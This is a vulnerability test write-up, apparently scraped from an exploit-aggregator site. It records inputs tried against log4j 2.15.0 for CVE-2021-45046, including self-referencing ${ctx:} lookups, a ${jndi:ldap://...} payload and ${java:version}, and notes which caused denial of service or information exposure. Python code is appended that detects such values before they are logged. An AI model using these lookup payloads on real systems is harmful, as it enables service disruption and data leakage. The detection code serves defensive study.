## https://sploitus.com/exploit?id=0D243A34-B42E-5007-90D0-A30ECABDA204
Although the log4j RCE (CVE-2021-44228) was patched in 2.15, a new vulnerability, CVE-2021-45046 (causing DoS), was discovered.
Below are the results of my tests.
[Test environment]
log4j-2.15.0 (api, core)
JRE-1.8.0
jdk1.8.0_151
Eclipse IDE (Maven Project)
1. Log4j RCE (CVE-2021-44228) lookup string test -> Not Vuln
![image](https://user-images.githubusercontent.com/70466565/146639780-c2ccb224-b72b-462e-ba02-0c2045c7cb30.png)
2. An arbitrary ctx object name inserted -> Not vuln
![image](https://user-images.githubusercontent.com/70466565/146639782-f24f8876-e954-42aa-a148-d32e1fb2eb9c.png)
3. Inserted using the same name as the object that receives the context -> DoS via infinite loop
![image](https://user-images.githubusercontent.com/70466565/146639787-aea999b8-e0ae-4106-be7b-04f70d1c933a.png)
4. Inserted in the form ${jndi:ldap://127.0.0.1#[ldap server address]} -> UnknownHostException raised, no DoS
![image](https://user-images.githubusercontent.com/70466565/146639795-a6349de8-8bda-40ae-81df-85e59f21dea3.png)
5. Form jndi:ldap://[ldap server]#[ldap server] -> Not vuln
![image](https://user-images.githubusercontent.com/70466565/146639814-57b93e1d-4f00-4d3a-80a3-3c2987835657.png)
6. Java code inserted -> DoS via IllegalArgumentException
![image](https://user-images.githubusercontent.com/70466565/146639850-ac43fe34-bb58-4563-9442-d8aaf8d03a98.png)
7-1. Java lookup string inserted -> System info exposure
![image](https://user-images.githubusercontent.com/70466565/146639820-137e5778-9997-4eb3-ac28-c5a079c8a1ff.png)
7-2. Java lookup string inserted -> IllegalArgumentException, DoS
![image](https://user-images.githubusercontent.com/70466565/146639859-a0ac8422-7fca-476c-8bde-0f729d7a35b8.png)
-> Checking where the IllegalArgumentException is raised: it is a switch-case statement, and at 2-5 the Java lookup strings that allow System info exposure (${java:version} ...) appear to be a routine that does not work.
![image](https://user-images.githubusercontent.com/70466565/146639864-735dc8cf-cdd4-4448-ac85-08866e0fbcda.png)
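Steps 3 to 5 above boil down to two input conditions a defender can check before an untrusted value reaches ThreadContext.put(): a value whose ${ctx:key} reference points back at its own key (or forms a longer chain back to itself), which is the infinite-loop case of step 3, and a value carrying a ${jndi:...} lookup as in steps 4 and 5. The following is an added example, not code from this repository or from Log4j; it models the lookup syntax with a simplified regex (nested lookups are assumed out of scope) and all sample values are constructed.

```python
import re
from typing import Dict, List

# Simplified model of a Log4j 2 lookup token ${prefix:body}. Nested lookups
# such as ${ctx:${ctx:x}} are deliberately not modelled (assumption for this demo).
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z]+)\s*:([^}]*)\}")

def ctx_references(value: str) -> List[str]:
    """ThreadContext keys that `value` resolves through ${ctx:key}.
    A default after ':-' is ignored: ${ctx:user:-anon} references 'user'."""
    return [body.split(":-", 1)[0].strip()
            for prefix, body in LOOKUP_RE.findall(value)
            if prefix.lower() == "ctx"]

def has_jndi_lookup(value: str) -> bool:
    """True when the value would trigger a JNDI lookup (steps 4-5)."""
    return any(p.lower() == "jndi" for p, _ in LOOKUP_RE.findall(value))

def find_lookup_cycles(context: Dict[str, str]) -> List[List[str]]:
    """Every reference cycle among ThreadContext values. A value naming its
    own key (step 3: loginId = '${ctx:loginId}') is the shortest cycle;
    a -> b -> a chains are found by the same depth-first walk."""
    graph = {key: ctx_references(val) for key, val in context.items()}
    cycles: List[List[str]] = []
    path: List[str] = []
    finished = set()

    def walk(node: str) -> None:
        if node in finished or node not in graph:
            return  # an unknown key resolves to nothing, so it cannot recurse
        if node in path:
            cycles.append(path[path.index(node):] + [node])
            return
        path.append(node)
        for ref in graph[node]:
            walk(ref)
        path.pop()
        finished.add(node)

    for key in graph:
        walk(key)
    return cycles

def unsafe_context_keys(context: Dict[str, str]) -> List[str]:
    """Keys to reject before ThreadContext.put(): in a ctx cycle or carrying jndi."""
    cyclic = {k for cycle in find_lookup_cycles(context) for k in cycle}
    jndi = {k for k, v in context.items() if has_jndi_lookup(v)}
    return sorted(cyclic | jndi)

# Constructed sample: step 3's self-reference, an indirect cycle, a JNDI
# lookup shaped like step 4 (placeholder host), and a benign value.
SAMPLE_CONTEXT = {
    "loginId": "${ctx:loginId}",
    "a": "${ctx:b}", "b": "${ctx:a}",
    "sessionId": "${jndi:ldap://127.0.0.1#ldap.example/x}",
    "requestId": "req-42",
}
```

Running unsafe_context_keys(SAMPLE_CONTEXT) returns ['a', 'b', 'loginId', 'sessionId'], leaving only the benign requestId.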